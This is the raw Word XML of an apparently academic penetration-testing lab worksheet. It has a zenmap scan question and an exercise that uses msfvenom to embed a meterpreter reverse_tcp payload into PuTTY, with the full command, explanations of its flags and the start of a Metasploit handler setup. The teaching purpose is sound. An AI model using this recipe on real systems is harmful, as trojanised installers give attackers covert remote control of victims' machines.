        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>root@kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3465A4"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t># sudo zenmap &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA156C" w:rsidRDefault="00CA156C" w:rsidP="00CA156C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CA156C" w:rsidRPr="00901E2C" w:rsidRDefault="00CA156C" w:rsidP="00CA156C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set up </w:t>
      </w:r>
      <w:r w:rsidRPr="0032386E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>zenmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to perform the same host discovery scan as in question 1. After the scan is complete, navigate to the “topology” tab and take a screenshot of the network diagram. Using MS Paint or MS Word add more information to the network diagram including operating system version and MAC addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA156C" w:rsidRDefault="00CA156C" w:rsidP="00CA156C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CA156C" w:rsidRDefault="004F2FC0" w:rsidP="00CA156C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Q3</w:t>
      </w:r>
      <w:r w:rsidR="00CA156C" w:rsidRPr="00042737">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CA156C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA156C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>Paste your network diagram (topology) image below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0014684A" w:rsidRPr="00901E2C" w:rsidRDefault="0014684A" w:rsidP="00F85832">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF74C3" w:rsidRDefault="00BF74C3" w:rsidP="00B8139E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B8139E" w:rsidRDefault="00B24440">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251722752" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>723062</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4064</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4195744" cy="2911323"/>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5744" cy="2911323"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B8139E">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE08CC" w:rsidRDefault="00CE08CC" w:rsidP="00CE08CC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Exercise-5-1-2: </w:t>
      </w:r>
      <w:r w:rsidR="00FD65B0">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Adding a malicious payload to PuTTy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE08CC" w:rsidRDefault="00CE08CC" w:rsidP="00CE08CC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE08CC" w:rsidRDefault="00EA6114" w:rsidP="00CE08CC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Now we are going to embed a payload into an innocent looking application: the PuTTy tool. We are using Metasploit, specifically</w:t>
      </w:r>
      <w:r w:rsidR="00972146">
        <w:t xml:space="preserve"> the Metasploit Venom program to embed a payload into the PuTTy executable file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE08CC" w:rsidRDefault="00CE08CC" w:rsidP="00CE08CC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE08CC" w:rsidRDefault="00972146" w:rsidP="00CE08CC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Firstly, in your Windows XP machine perform the following tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00CE08CC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Open the Start Menu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Click “Run…”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A31B07" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enter: </w:t>
      </w:r>
      <w:r w:rsidR="00A31B07" w:rsidRPr="00972146">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\\vmware-host\Shared Folders\</w:t>
      </w:r>
      <w:r w:rsidR="00DB49DB" w:rsidRPr="00972146">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>vm</w:t>
      </w:r>
      <w:r w:rsidR="00A31B07" w:rsidRPr="00972146">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00972146">
        <w:t>It c</w:t>
      </w:r>
      <w:r>
        <w:t>an sometimes take a minute to load the shared folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Verify you are connected to the correct shared folder: there should be a file called PuTTy.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8139E" w:rsidRPr="00972146" w:rsidRDefault="00B8139E" w:rsidP="00B8139E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006406F2" w:rsidRDefault="00972146" w:rsidP="00983119">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Now, switch to Kali Linux. We are now going to create a malicious executable. There should be a shared folder on your Desktop called “vmshare”. Open it (double click) and verify that the same PuTTy.exe file is in the shared folder. This shared folder is the same folder than is shared between all our virtual machines. The actual location is D:\IN618\vmshare, meaning it is stored on the local hard drive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB2C6F" w:rsidRDefault="00EB2C6F" w:rsidP="00983119">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB2C6F" w:rsidRDefault="00EB2C6F" w:rsidP="00983119">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>On the Kali Linux machine, change to the shared folder directory</w:t>
      </w:r>
      <w:r w:rsidR="006E0F02">
        <w:t xml:space="preserve">. Now, we will use </w:t>
      </w:r>
      <w:r w:rsidR="006E0F02" w:rsidRPr="001853DA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidR="006E0F02">
        <w:t xml:space="preserve"> to create a malicious executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB2C6F" w:rsidRDefault="00EB2C6F" w:rsidP="00E86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p>
    <w:p w:rsidR="00EB2C6F" w:rsidRDefault="00EB2C6F" w:rsidP="00EB2C6F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>root@kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3465A4"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> cd /mnt/hgfs/share/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E0F02" w:rsidRDefault="006E0F02" w:rsidP="00EB2C6F">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09"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E86BC6" w:rsidRDefault="00E86BC6" w:rsidP="00EB2C6F">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09"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>root@kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3465A4"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="00524E36" w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.19.11 lport=443 -f exe -o puttyX.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E0F02" w:rsidRDefault="006E0F02" w:rsidP="00EB2C6F">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09"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006E0F02" w:rsidRPr="006E0F02" w:rsidRDefault="006E0F02" w:rsidP="001853DA">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bCs/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>Review the output from the command</w:t>
      </w:r>
      <w:r w:rsidR="001853DA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> and check it ran correctly. Now we are going to decipher the command we just ran. Run the following command to get the </w:t>
      </w:r>
      <w:r w:rsidR="001853DA" w:rsidRPr="001853DA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidR="001853DA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> help menu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E0F02" w:rsidRDefault="006E0F02" w:rsidP="00EB2C6F">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09"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006E0F02" w:rsidRPr="00A31B07" w:rsidRDefault="006E0F02" w:rsidP="00EB2C6F">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09"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>root@kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3465A4"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> msfvenom -h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86BC6" w:rsidRDefault="00E86BC6" w:rsidP="00983119">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B75B34" w:rsidRDefault="00B75B34" w:rsidP="00B75B34">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00042737">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251717632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D5A433C" wp14:editId="4AD218AE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>408940</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5705475" cy="20478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47875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w:rsidR="00B75B34" w:rsidRDefault="00B75B34" w:rsidP="00B75B34">
                            <w:r>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidR="00B24440">
                              <w:t>-a : The architecture to use (x86/x64)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00293FAC" w:rsidRDefault="00186C50" w:rsidP="00B75B34">
                            <w:r>
                              <w:t>--platform : The platform of the payload</w:t>
                            </w:r>
                            <w:r w:rsidR="00293FAC">
                              <w:t xml:space="preserve"> (Windows)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00186C50" w:rsidRDefault="00186C50" w:rsidP="00B75B34">
                            <w:r>
                              <w:t>-x : Custom executable template (putty.exe)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00293FAC" w:rsidRDefault="00293FAC" w:rsidP="00B75B34">
                            <w:r>
                              <w:t>-k : Keep the template behaviour and inject payload as new thread</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00293FAC" w:rsidRDefault="00293FAC" w:rsidP="00B75B34">
                            <w:r>
                              <w:t>-p : Payload to use</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00293FAC" w:rsidRDefault="00293FAC" w:rsidP="00B75B34">
                            <w:r>
                              <w:t>-f : Output format (exe)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00293FAC" w:rsidRDefault="00293FAC" w:rsidP="00B75B34">
                            <w:r>
                              <w:t>-o : Save the payload (puttyX.exe)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00186C50" w:rsidRDefault="00186C50" w:rsidP="00B75B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A433C" id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:398.05pt;margin-top:32.2pt;width:449.25pt;height:161.25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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00B75B34" w:rsidRDefault="00B75B34" w:rsidP="00B75B34">
                      <w:r>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="00B24440">
                        <w:t>-a : The architecture to use (x86/x64)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00293FAC" w:rsidRDefault="00186C50" w:rsidP="00B75B34">
                      <w:r>
                        <w:t>--platform : The platform of the payload</w:t>
                      </w:r>
                      <w:r w:rsidR="00293FAC">
                        <w:t xml:space="preserve"> (Windows)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00186C50" w:rsidRDefault="00186C50" w:rsidP="00B75B34">
                      <w:r>
                        <w:t>-x : Custom executable template (putty.exe)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00293FAC" w:rsidRDefault="00293FAC" w:rsidP="00B75B34">
                      <w:r>
                        <w:t>-k : Keep the template behaviour and inject payload as new thread</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00293FAC" w:rsidRDefault="00293FAC" w:rsidP="00B75B34">
                      <w:r>
                        <w:t>-p : Payload to use</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00293FAC" w:rsidRDefault="00293FAC" w:rsidP="00B75B34">
                      <w:r>
                        <w:t>-f : Output format (exe)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00293FAC" w:rsidRDefault="00293FAC" w:rsidP="00B75B34">
                      <w:r>
                        <w:t>-o : Save the payload (puttyX.exe)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00186C50" w:rsidRDefault="00186C50" w:rsidP="00B75B34"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004F2FC0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Q4</w:t>
      </w:r>
      <w:r w:rsidRPr="00042737">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Describe each option (e.g., -a x86, -x putty.exe) used in the command. Give a brief overview of the purpose of each of these arguments (based on the help menu entries).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86BC6" w:rsidRDefault="00E86BC6" w:rsidP="00983119">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B75B34" w:rsidRDefault="00B75B34" w:rsidP="00983119">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Now we are going to set up a handler on our Kali Linux machine for when our target uses our malicious payload. Start Metasploit consoles, then we will use a exploit handler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B75B34" w:rsidRDefault="00B75B34" w:rsidP="00983119">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B75B34" w:rsidRPr="00A31B07" w:rsidRDefault="00B75B34" w:rsidP="00B75B34">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09"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>root@kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3465A4"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
